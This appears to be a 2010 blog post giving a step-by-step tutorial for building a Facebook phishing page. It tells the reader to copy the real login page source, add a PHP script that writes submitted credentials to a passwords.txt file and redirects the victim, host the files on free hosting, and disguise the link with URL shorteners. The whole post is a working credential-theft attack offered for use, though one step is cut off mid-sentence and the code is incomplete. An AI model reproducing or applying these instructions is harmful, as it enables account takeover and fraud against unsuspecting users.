Tuesday, December 21, 2010

How to make phishing page

1. First things first. Select a site you would like to use for this, in this case, we will be using Facebook.

2. Go to the login page of the site you will be phishing for (In my case, its http://www.facebook.com/login.php). Right click, and choose "View Page Source"

3. ALOT of text will come up. Right click and hit "Select All" and press [CTRL]+[C] and paste that into Notepad.

4. Press [CTRL]+[F] and search for "

5. Save that as Login.php

6. Now lets move on to the password getter. (You can change "Password.php" to whatever you want, as long as you keep the .php.)

7. Now to move onto the code that gets the password. The code for that is:

PHP Code
header("Location: https://login.facebook.com/login.php?login_attempt=1");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

You can change the change the location, by changing the code a bit.

PHP Code
header("Location: https://login.facebook.com/login.php?login_attempt=1");

8. Save that as Password.php, or whatever you called it on Login.php, and your almost done!

9. Go to www.ripway.com or other free hosting , and go to "My
Files" and then "Upload Files".

10. Upload both files and You will see this:

Your Phisher is now complete!!

Just click on the link to test it. (It will automatically create 'passwords.txt')

You should get something like this:

Basic Code

The bottom two lines are what you want!

11. (OPTIONAL). You can use www.TinyURL.com or www.dot.tk to disguise your link!

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